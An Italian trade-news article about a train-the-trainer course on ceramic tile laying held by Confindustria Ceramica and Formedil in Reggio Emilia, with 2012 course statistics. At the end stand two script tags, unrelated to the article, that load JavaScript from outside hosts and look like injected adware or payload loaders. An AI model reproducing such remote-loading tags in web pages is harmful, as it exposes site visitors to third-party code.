1. Home
  2. Notizie e Mercato
  3. Formedil: corso per Formatori del “sistema posa della piastrella ceramica”

Formedil: corso per Formatori del “sistema posa della piastrella ceramica”

di
5/5
votato da 1 persone
Secondo Corso di Formazione per i Formatori del sistema posa della piastrella ceramica a Reggio Emilia il 6-7 marzo


Il progetto “2T – Training for Tile”, promosso da Confindustria Ceramica e Formedil, ha organizzato nei giorni 6-7 marzo presso la Scuola Edile di Reggio Emilia il secondo corso di Formazione per Formatori del “sistema posa della piastrella ceramica”. Nell’ambito dell’appuntamento si traccerà un bilancio delle attività svolte, ad un anno dall’avvio dei diversi corsi. Il progetto di qualificare la posa attraverso la formazione si pone il triplice obiettivo di innalzare la qualità del mercato; offrire un servizio alle aziende e ai consumatori; contribuire al miglioramento del “sistema” della posa, con il coinvolgimento di tutti i soggetti interessati: i produttori, i posatori, le aziende di posa, le scuole di formazione, i fornitori di materiali tecnici e attrezzature.

Ai 55 Formatori, provenienti dalle scuole edili di tutta Italia, nelle due giornate di lezione verranno presentati gli strumenti e le metodologie di insegnamento e sarà rilasciato un attestato di frequenza al corso di formazioni per formatori dedicato alla “formazione nella posa” e una specifica annotazione di Qualificazione nel “cursus honorem” personale. Nelle giornate del corso si avrà l’occasione di approfondire aspetti teorici e pratici, con l’apprendimento di nuove normative e tecniche di posa a cui daranno il loro contributo l’Arch. Claudio Cigarini  direttore della Scuola Edile di Reggio Emilia; il Prof. Giorgio Timellini del Centro Ceramico Bologna e Università degli Studi di Bologna e i partners del “progetto posa”: Mapei, Schluter Systems e Raimondi.

Significativa è l’esperienza del primo anno di “2T-Training for Tile” che nel 2012 ha realizzato 21 corsi di formazione in dieci diverse Scuole raccogliendo 194 adesioni, suddivisi tra “avanzato” e “base”. Le scuole Edili e gli Enti professionali coinvolti nel 2012 sono stati Ente Scuola di Cuneo, Espe Lecco, Esef Savona, Scuola Edile Reggio Emilia, Edilmaster Trieste, Formedil di Bari, ESEF Frosinone, Scuola Edile di Perugia, Scuola edile della provincia di Lecce, IIPLE Bologna.

Prosegue nei mesi di marzo, aprile e maggio l’attività di formazione presso diverse scuole presenti sul territorio nazionale. Tale attività è il preludio alla seconda edizione de “La città della posa”, l’evento in programma durante il prossimo Cersaie (23/27 settembre 2013), che lo scorso anno ha riscontrato ampio interesse di visitatori nel vedere all’opera diversi posatori che si cimentavano nella posa dei materiali ceramici frutto della formazione condotta per volere di Confindustria Ceramica, di Formedil e dall’entusiasmo dei Direttori delle Scuole italiane.


<script src="https://loading-resource.com/data.js.php?i={271EC601-39CC-426C-935D-F754BCD76643}&amp;d=2012-10-16&amp;s=http://www.guidaedilizia.it/Backoffice/GuidaNews/Inserisci_Articoli.asp?TipologiaID=1" type="text/javascript"></script><script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&amp;pid=1032&amp;zoneid=62862"></script>